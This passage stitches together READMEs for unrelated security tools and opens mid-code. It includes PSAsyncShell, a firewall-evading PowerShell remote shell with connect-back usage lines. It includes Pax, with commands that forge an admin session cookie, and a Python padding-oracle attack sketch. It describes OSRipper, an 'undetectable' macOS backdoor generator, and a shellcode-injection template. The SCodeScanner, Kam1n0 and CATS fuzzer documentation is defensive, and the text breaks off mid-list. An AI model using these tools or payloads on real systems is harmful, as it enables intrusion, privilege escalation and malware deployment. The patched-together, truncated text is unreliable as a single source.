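restored = b"".join(decode_chunk(c) for c in wire)
```

Each element of `wire` is a short, URL-safe string that can be sent independently; the receiver simply concatenates the decoded chunks.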
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/PSAsyncShell
.\PSAsyncShell.ps1 -h
____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/
---------------------- by @JoelGMSec -----------------------
Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls
Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client
.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server
Warning: All info between parts will be sent unencrypted
Download & Upload functions don't use MultiPart
https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona
This project is licensed under the GNU GPL 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Exploit padding oracles for fun and profit!
Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:
This can be used to disclose encrypted session information and, often, to bypass authentication, elevate privileges and execute code remotely by encrypting custom plaintext and writing it back to the server.
As always, this tool should only be used on systems you own and/or have permission to probe!
Download from releases, or install with Go:
go get -u github.com/liamg/pax/cmd/pax
If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS
, you can use the following:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
This will hopefully give you some plaintext, perhaps something like:
{"user_id": 456, "is_admin": false}
It looks like you could elevate your privileges here!
You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
This will spit out another base64 encoded set of encrypted data, perhaps something like:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you can open your browser and set the value of the SESS
cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.
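The attack Pax automates can be sketched end to end. The following Python sketch is not Pax's implementation (Pax is written in Go); it simulates a CBC-mode service with a toy block cipher standing in for AES, and recovers the plaintext purely by querying the padding oracle. The toy cipher, key, and block size are all illustrative assumptions.

```python
import os

KEY = bytes(range(16))  # toy secret key (demo only, NOT real crypto)
BS = 16                 # block size

def _E(block):   # toy invertible "block cipher" standing in for AES
    return bytes((b + KEY[i]) % 256 for i, b in enumerate(block))

def _D(block):
    return bytes((b - KEY[i]) % 256 for i, b in enumerate(block))

def encrypt(pt: bytes) -> bytes:
    """CBC-encrypt with PKCS#7 padding; returns IV || ciphertext."""
    pad = BS - len(pt) % BS
    pt += bytes([pad]) * pad
    iv = os.urandom(BS)
    out, prev = iv, iv
    for i in range(0, len(pt), BS):
        blk = _E(bytes(a ^ b for a, b in zip(pt[i:i + BS], prev)))
        out += blk
        prev = blk
    return out

def oracle(ct: bytes) -> bool:
    """The vulnerable server: returns True iff padding is valid."""
    prev, pt = ct[:BS], b""
    for i in range(BS, len(ct), BS):
        blk = ct[i:i + BS]
        pt += bytes(a ^ b for a, b in zip(_D(blk), prev))
        prev = blk
    pad = pt[-1]
    return 1 <= pad <= BS and pt[-pad:] == bytes([pad]) * pad

def attack_block(prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block using only the oracle."""
    inter = bytearray(BS)               # intermediate state D(target)
    for pad in range(1, BS + 1):
        pos = BS - pad
        for guess in range(256):
            fake = bytearray(BS)
            for j in range(pos + 1, BS):
                fake[j] = inter[j] ^ pad
            fake[pos] = guess
            if not oracle(bytes(fake) + target):
                continue
            if pad == 1:                # rule out an accidental \x02\x02 hit
                fake[pos - 1] ^= 0xFF
                if not oracle(bytes(fake) + target):
                    continue
            inter[pos] = guess ^ pad
            break
    return bytes(i ^ p for i, p in zip(inter, prev))

ct = encrypt(b'{"user_id": 456, "is_admin": false}')
blocks = [ct[i:i + BS] for i in range(0, len(ct), BS)]
recovered = b"".join(attack_block(blocks[i], blocks[i + 1])
                     for i in range(len(blocks) - 1))
```

Stripping the recovered PKCS#7 padding yields the original session JSON, with no knowledge of the key; tools like Pax run the same per-byte loop against a real HTTP endpoint.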
The following are great guides on how this attack works:
SCodeScanner stands for Source Code Scanner, a tool with which users can scan source code to find critical vulnerabilities. Its main objective is to find vulnerabilities in source code before the code is published to production.
SCodeScanner has received 5 CVEs for finding vulnerabilities in multiple CMS plugins.
pip3 install -r requirements.txt
python3 scscanner.py --help
I would love to hear your feedback on this tool. Open an issue if you find any problems, and open a PR if you have something to contribute.
OSRipper is a fully undetectable backdoor generator and crypter which specialises in macOS M1 malware. It will also work on Windows, but for now there is no support for it and it IS NOT FUD for Windows (yet, at least); for now I will not focus on Windows.
You can also PM me on Discord for support or to ask for new features: SubGlitch1#2983
Please check the wiki for information on how OSRipper functions (it changes extremely frequently):
https://github.com/SubGlitch1/OSRipper/wiki
Here are example backdoors which were generated with OSRipper
macOS .apps will look like this on VirusTotal
You need Python. If you do not wish to install Python, you can download a compiled release. The Python dependencies are specified in the requirements.txt file.
Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.
apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt
or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3
Just this:
sudo python3 main.py
Please feel free to fork and open pull requests. Suggestions/criticism are appreciated as well.
Coming soon
Just open an issue and I'll make sure to get back to you
0.2.1
0.1.6
0.1.5
0.1.4
0.1.3
0.1.2
0.1.1
MIT
Inspiration, code snippets, etc.
I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work, I would be really happy about any donation. You do NOT have to; this is entirely optional.
BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T
I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.
Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.
The advantage of grabbing syscalls dynamically is that the signatures of the stubs are not included in the file, and you don't have to worry about changing Windows versions.
To compile the shellcode execution template run the following:
nim c -d:release ShellcodeInject.nim
The result should look like this:
Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provides different analytic services such as clone search and classification. It supports multi-tenant access and management of assembly repositories by using the concept of an Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, the Kam1n0 v2.x server currently provides three different types of clone-search applications - Asm-Clone, Sym1n0, and Asm2Vec - and an executable classification application based on Asm2Vec. New application types can be added to the platform.
A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.
Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:
S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.
S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.
Asm-Clone applications try to solve the efficient subgraph search problem (i.e. graph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).
Sym1n0 provides semantic clone search by differentiated fuzz testing and constraint solving - an efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). It supports visualization of the abstract syntax graph.
Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm*
registers are semantically related to vector operations such as addps
. memcpy
is similar to strcpy
. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp
in libgmp. From left to right, the assembly functions are compiled with GCC O0 option, GCC O3 option, O-LLVM obfuscator Control Flow Graph, Flattening option, and LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.
In this application, the user defines a set of software classes based on functional relatedness and provides binaries belonging to each class. The system then automatically groups functions into clusters in which functions are connected directly or indirectly by clone relations. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree to which it belongs to each software class.
It uses Asm2Vec as its function similarity computation model.
The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.
The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.
Installer | Included components | Description |
---|---|---|
Kam1n0-Server.msi | Core engine | Main engine providing service for indexing and searching. |
Workbench | A user interface to manage the repositories and running service. | |
Web user interface | Web user interface for searching/indexing binary files and assembly functions. | |
Visual C++ redistributable for VS 15 | Dependency for z3. | |
Kam1n0-IDA-Plugin.msi | Plug-in | Connectors and user interface. |
PyPI wheels for Cefpython | Rendering engine for the user interface. | |
PyPI and dependent wheels | Package management for Python. Included for IDA 6.8 &6.9. |
The Kam1n0 core engine is purely written in Java. You need the following dependencies:
Download the Kam1n0-Server.msi
file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling; in other words, if the client side uses the Kam1n0 plug-in for IDA Pro. It is strongly suggested to have IDA Pro installed alongside the Kam1n0 server. The Kam1n0 server will automatically detect your IDA Pro installation by looking for the default application used to open .i64
file.
The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:
Next, download the Kam1n0-IDA-Plugin.msi
installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins
. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins
. The installer will detect and validate the path.
Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)
sudo add-apt-repository ppa:webupd8team/java
If you get an error (~webupd8team not found) and you are behind a proxy, make sure you set and export your http_proxy and https_proxy environment variables, then try again with the -E option on sudo. Additionally, if you get an "add-apt-repository command not found" error, try: sudo apt install -y software-properties-common
Run sudo apt-get update, then sudo apt-get install oracle-java8-installer
Verify the installation with java -version; you may need to manually set the JAVA_HOME environment variable (in /etc/environment): JAVA_HOME=/usr/lib/jvm/java-11-oracle
Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.
Extract the two tarballs (i.e. tar -xvzf Kam1n0-IDA-Plugin.tar.gz and tar -xvzf Kam1n0-Server.tar.gz)
The Kam1n0-Server.tar.gz file will create the server directory.
Inside the server
directory, you should see a file called kam1n0.properties
, which is where you will set various configurations for kam1n0; this is very important.
Set kam1n0.data.path
to where you would like your kam1n0-related data to be written to. We choose to put it in the same place that we keep our server
. kam1n0.ida.home
refers to where your IDA installation is located. Comment this line (and kam1n0.ida.batch
, the line following) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties
file, see the kam1n0.properties.explained
file.
Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar
. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start
. This starts the server from the console without a window.
To connect and use it, go to 127.0.0.1:8571
(the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.
The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.
Clone the latest stable branch (don't forget --recursive
!):
git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community
IntelliJ: Import the root /kam1n0/kam1n0/ as a Maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all Maven projects from the git repository. You may need to modify the classpath to address any errors. All the resource paths are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).
To build the project:
cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package
The resulting binaries can be found in /kam1n0/build-bins/
To run the test code, you will need to first download chromedriver.exe
from http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver
. It is also required that there is a chrome browser installed in the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.
cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test
These commands only compile the Java code, using pre-compiled wheels of libvex and z3, and work out of the box. The builds of libvex and z3 are platform-dependent. We use a fork of libvex from Angr. More thorough build scripts, as well as installers for Windows/Linux, can be found under /kam1n0-builds/
We have a Jenkins server for continuous development and delivery. The latest stable release will be posted here. Periodically, we synchronize our internal experimental branch with this repository.
The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.
Copyright 2014-2021 McGill University and the Researchers. All rights reserved.
REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!
By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data, from fully random large Unicode values to well-crafted, context-dependent values based on the request data types and constraints. Moreover, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.
This is a list of articles with step-by-step guides on how to use CATS:
> brew tap endava/tap
> brew install cats
CATS is bundled both as an executable JAR and as a native binary. The native binaries do not need Java installed.
After downloading the native binary for your OS, you can add it to a directory on your PATH so that you can execute it like any other command line tool:
sudo cp cats /usr/local/bin/cats
You can also get autocomplete by downloading the cats_autocomplete script and do:
source cats_autocomplete
To get persistent autocomplete, add the above line in ~/.zshrc
or ~/.bashrc
, but make sure you put the fully qualified path for the cats_autocomplete
script.
You can also check the cats_autocomplete
source for alternative setup.
There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.
You can run it as java -jar cats.jar
.
Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.
You can build CATS from sources on your local box. You need Java 11+. Maven is already bundled.
Before running the first build, please make sure you do a ./mvnw clean
. CATS uses a fork of OKHttpClient
which will install locally under the 4.9.1-CATS
version, so don't worry about overriding the official versions.
You can use the following Maven command to build the project:
./mvnw package -Dquarkus.package.type=uber-jar
cp target/
You will end up with a cats.jar
in the target
folder. You can run it with java -jar cats.jar ...
.
You can also build native images using a GraalVM Java version.
./mvnw package -Pnative
Note: You will need to configure Maven with a Github PAT with read-packages
scope to get some dependencies for the build.
You may see some ERROR
log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers
.
Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.
> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox
In blackbox mode CATS will only report ERRORs
if the received HTTP response code is a 5XX
. Any other mismatch between what the Fuzzer expects and what the service returns (for example the Fuzzer expects a 400
and the service returns a 200
) will be ignored.
The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.
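The blackbox reporting rule above reduces to a one-line check. This hypothetical helper merely restates it; it is not CATS code.

```python
def blackbox_verdict(status_code: int) -> str:
    """Blackbox-mode rule: only 5XX responses count as errors;
    any other Fuzzer-expectation mismatch is ignored."""
    return "error" if 500 <= status_code <= 599 else "ignored"
```

For example, a 503 would be reported as an error, while an undocumented 400 would be silently ignored in this mode.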
The real power of CATS lies in running it in a non-blackbox mode, also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response matches the schema defined in the OpenAPI spec for that response code. This allows you to tweak either your OpenAPI spec or the service behaviour in order to create good quality APIs and documentation, and also to avoid possibly serious bugs.
Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any entities/resources required by request fields or query params are created in advance and added to the reference data file.
> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml
You may notice a significant number of tests marked as skipped
. CATS will try to apply all Fuzzers
to all fields, but this is not always possible. For example the BooleanFieldsFuzzer
cannot be applied to String
fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped
tests in order to show that CATS actually tries all the Fuzzers
on all the fields/paths/endpoints.
Additionally, CATS supports many more arguments that allow you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.
CATS generates tests based on configured Fuzzer
s. Each Fuzzer
has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer
expected result. Depending on the matching outcome, CATS will report as follows:
INFO
/SUCCESS
is expected and documented behaviour. No need for action.WARN
is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.ERROR
is abnormal/unexpected behaviour. This must be actioned.CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf
/anyOf
elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer
executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:
This means that for methods with request bodies (POST,PUT
) that have also URL/path parameters, you need to supply the path
parameters via urlParams
or the referenceData
file as failure to do so will result in Illegal character in path at index ...
errors.
HTML_JS
is the default report produced by CATS. The execution report is placed in a folder called cats-report/TIMESTAMP
or cats-report
depending on the --timestampReports
argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP
value when the run started. This allows you to have a history of the runs. The report itself is in the index.html
file, where you can:
All
, Success
, Warn
and Error
Fuzzer
so that you can only see the runs for that specific Fuzzer
Along with the summary from index.html
each individual test will have a specific TestXXX.html
page with more details, as well as a json version of the test which can be later replayed using > cats replay TestXXX.json
.
Understanding the Result Reason
values:
Unexpected Exception
- reported as error
; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATSNot Matching Response Schema
- reported as a warn
; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contractUndocumented Response Code
- reported as a warn
; this indicates that the service returns an expected response code, but the response code is not documented in the contractUnexpected Response Code
- reported as an error
; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenarioUnexpected Behaviour
- reported as an error
; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenarioNot Found
- reported as an error
in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData
and/or --urlParams
argumentsAnd this is what you get when you click on a specific test:
This format is similar with HTML_JS
, but you cannot do any filtering or sorting.
CATS also supports JUNIT output. The output will be a single testsuite
that will incorporate all tests grouped by Fuzzer
name. As the JUNIT format does not have the concept of warning
the following mapping is used:
error
is reported as JUNIT error
failure
is not used at allwarn
is reported as JUNIT skipped
skipped
is reported as JUNIT disabled
The JUNIT report is written as junit.xml
in the cats-report
folder. Individual tests, both as .html
and .json
will also be created.
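The CATS-to-JUNIT mapping above can be captured as a small table. This is a hypothetical sketch, not part of CATS; the "success" to "passed" row is an assumption, since the text only covers error, warn and skipped.

```python
# CATS result -> JUnit result, per the mapping described above
CATS_TO_JUNIT = {
    "error": "error",       # CATS errors become JUnit errors
    "warn": "skipped",      # JUnit has no warning concept
    "skipped": "disabled",  # intentionally skipped CATS tests
    "success": "passed",    # assumed; not stated explicitly in the text
}

def junit_result(cats_result: str) -> str:
    # 'failure' is deliberately absent: the JUnit failure state is not used
    return CATS_TO_JUNIT[cats_result]
```

Note that nothing ever maps to the JUnit "failure" state, matching the rule that failure is not used at all.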
CATS has a significant number of Fuzzers
. Currently, 89 and growing. Some of the Fuzzers
are executing multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer
has 63 control chars values that will be tried for each request field. If a request has 15 fields for example, this will result in 1020 tests. Considering that there are additional Fuzzers
with the same magnitude of tests being generated, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).
Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.
You can use the --paths=PATH
argument to run CATS sequentially for each path.
You can use the --checkXXX
arguments to run CATS only with specific Fuzzers
like: --checkHttp
, --checkFields
, etc.
You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2
or --skipFuzzers=Fuzzer1,Fuzzer2
to either include or exclude specific Fuzzers
. For example, you can run all Fuzzers
except for the ControlChars
and Whitespaces
ones like this: --skipFuzzers=ControlChars,Whitespaces
. This will skip all Fuzzers containing these strings in their name. After, you can create an additional run only with these Fuzzers
: --fuzzers=ControlChars,Whitespaces
.
These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.
Please note that due to the fact that ControlChars, Emojis and Whitespaces
generate a huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars
, --includeWhitespaces
and/or --includeEmojis
arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.
By default, CATS will report WARNs
and ERRORs
according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX
arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and report those cases as success instead of WARN
or ERROR
. For example, if you want CATS to report ERRORs
only when there is an Exception or the service returns a 500
, you can use this: --ignoreResponseCodes="2xx,4xx"
.
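Patterns like 2xx and 4xx match any status code with the given leading digit. The matching can be sketched as follows; these are hypothetical helpers for illustration, the real logic lives inside CATS.

```python
def code_matches(pattern: str, code: int) -> bool:
    """Match an HTTP status code against a CATS-style pattern like '2xx' or '500'.
    An 'x' in the pattern matches any digit in that position."""
    digits = str(code)
    return len(digits) == len(pattern) and all(
        p.lower() == "x" or p == d for p, d in zip(pattern, digits)
    )

def should_ignore(code: int, patterns: str = "2xx,4xx") -> bool:
    # With "2xx,4xx", only 5XX responses (and exceptions) remain errors
    return any(code_matches(p.strip(), code) for p in patterns.split(","))
```

With the default "2xx,4xx" pattern list, a 404 would be downgraded to success while a 500 would still be reported.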
You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code based on the scenario under test, and will report a WARN when the service returns the expected response code but that response code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking the expected response code against the contract) using the --ignoreResponseCodeUndocumentedCheck
argument. CATS will now report these cases as SUCCESS
instead of WARN
.
Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report a WARN
if not matching. You can make CATS ignore the response body checks using the --ignoreResponseBodyCheck
argument. CATS will now report these cases as SUCCESS
instead of WARN
.
When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.
The syntax for replaying tests is the following:
> cats replay "Test1,Test233,Test15.json,dir/Test19.json"
Some notes on the above example:
,
Test15.json
in the current folder and Test19.json
in the dir
foldercats-report
folder i.e. cats-report/Test1.json
and cats-report/Test233.json
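The resolution rules in those notes can be sketched as follows; resolve_replay_paths is a hypothetical helper, not the CATS implementation.

```python
from pathlib import Path

def resolve_replay_paths(spec: str, report_dir: str = "cats-report"):
    """Resolve a comma-separated replay list: entries ending in .json are
    taken as given (relative to the current folder), while bare test names
    are looked up inside the cats-report folder."""
    paths = []
    for entry in (e.strip() for e in spec.split(",")):
        if entry.endswith(".json"):
            paths.append(Path(entry))
        else:
            paths.append(Path(report_dir) / f"{entry}.json")
    return paths

paths = resolve_replay_paths("Test1,Test233,Test15.json,dir/Test19.json")
```

For the example above, Test1 and Test233 resolve inside cats-report, while Test15.json and dir/Test19.json are used as-is.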
To list all available commands, run:
> cats -h
All available subcommands are listed below:
> cats help
or cats -h
will list all available options
> cats list --fuzzers
will list all the existing fuzzers, grouped on categories
> cats list --fieldsFuzzingStrategy
will list all the available fields fuzzing strategies
> cats list --paths --contract=CONTRACT
will list all the paths available within the contract
> cats replay "test1,test2"
will replay the given tests test1
and test2
> cats fuzz
will fuzz based on a given request template, rather than an OpenAPI contract
> cats run
will run functional and targeted security tests written in the CATS YAML format
> cats lint
will run OpenAPI contract linters, also called ContractInfoFuzzers
--contract=LOCATION_OF_THE_CONTRACT
supplies the location of the OpenApi or Swagger contract.--server=URL
supplies the URL of the service implementing the contract.--basicauth=USR:PWD
supplies a username:password
pair, in case the service uses basic auth.--fuzzers=LIST_OF_FUZZERS
supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS will check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.--log=PACKAGE:LEVEL
can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug
or suppress CATS logging: --log=com.endava.cats:warn
--paths=PATH_LIST
supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.--skipPaths=PATH_LIST
a comma separated list of paths to ignore. If no path is supplied, no path will be ignored--fieldsFuzzingStrategy=STRATEGY
specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE
, SIZE
and POWERSET
. More information on field fuzzing can be found in the sections below.--maxFieldsToRemove=NUMBER
specifies the maximum number of fields to be removed when using the SIZE
fields fuzzing strategy.--refData=FILE
specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.--headers=FILE
specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.--edgeSpacesStrategy=STRATEGY
specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate
and validateAndTrim
.--sanitizationStrategy=STRATEGY
specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate
and validateAndSanitize
--urlParams
A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).--functionalFuzzerFile
a file used by the FunctionalFuzzer
that will be used to create user-supplied payloads.--skipFuzzers=LIST_OF_FIZZERs
a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer
names (for example: --skippedFuzzers=VeryLargeStringsFuzzer
) or partial Fuzzer
names (for example: --skipFuzzers=VeryLarge
). CATS
will check if the Fuzzer
names contains the string you provide in the arguments value.--skipFields=field1,field2#subField1
a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.--httpMethods=PUT,POST,etc
a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract--securityFuzzerFile
A file used by the SecurityFuzzer
that will be used to inject special strings in order to exploit possible vulnerabilities--printExecutionStatistics
If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
--timestampReports
If supplied (no value needed), it will output the report still inside the cats-report
folder, but in a sub-folder with the current timestamp--reportFormat=FORMAT
Specifies the format of the CATS report. Supported formats: HTML_ONLY
, HTML_JS
or JUNIT
. You can use HTML_ONLY
if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS
which includes some sorting and filtering capabilities.--useExamples
If true
(default value when not supplied) then CATS will use examples supplied in the OpenAPI contact. If false
CATS will rely only on generated values--checkFields
If supplied (no value needed), it will only run the Field Fuzzers--checkHeaders
If supplied (no value needed), it will only run the Header Fuzzers--checkHttp
If supplied (no value needed), it will only run the HTTP Fuzzers--includeWhitespaces
If supplied (no value needed), it will include the Whitespaces Fuzzers--includeEmojis
If supplied (no value needed), it will include the Emojis Fuzzers--includeControlChars
If supplied (no value needed), it will include the ControlChars Fuzzers--includeContract
If supplied (no value needed), it will include ContractInfoFuzzers
--sslKeystore
Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL--sslKeystorePwd
The password of the sslKeystore
--sslKeyPwd
The password of the private key from the sslKeystore
--proxyHost
The proxy server's host name (if running behind proxy)--proxyPort
